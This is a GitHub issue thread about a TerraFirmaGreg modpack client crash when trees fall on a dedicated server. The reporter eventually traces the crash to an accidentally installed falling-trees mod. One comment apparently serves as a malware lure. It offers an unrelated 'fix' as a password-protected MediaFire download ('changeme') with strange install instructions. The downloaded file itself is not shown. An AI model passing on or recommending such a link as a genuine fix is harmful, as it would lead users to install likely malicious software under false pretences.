### ISSUE TITLE
Players crash in dedicated server when trees are falling

### ISSUE THREAD

**Issue by SkettiSouls** [TerraFirmaGreg-Team/Modpack-Modern#452]
### Version modpack Used

0.7.12

### Environment

Forge Server

### Side Crashed

Client

### New Worlds

Yes

### Steps to Reproduce

1. Start server with `java -jar ./minecraft_server.jar -Xmx12288M -Xms3072M nogui`
2. Join world
3. Break tree

### Crash Report

[crash-2024-08-26_22.59.38-client.txt](https://github.com/user-attachments/files/16756291/crash-2024-08-26_22.59.38-client.txt)

**Comment by SkettiSouls** [comment]
Disabling the tree falling animation fixes crashes, but causes trees to not drop saplings or sticks.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by SkettiSouls** [comment]
Somehow accidentally installed pandas falling trees 1.12.1, removing fixed the issue.
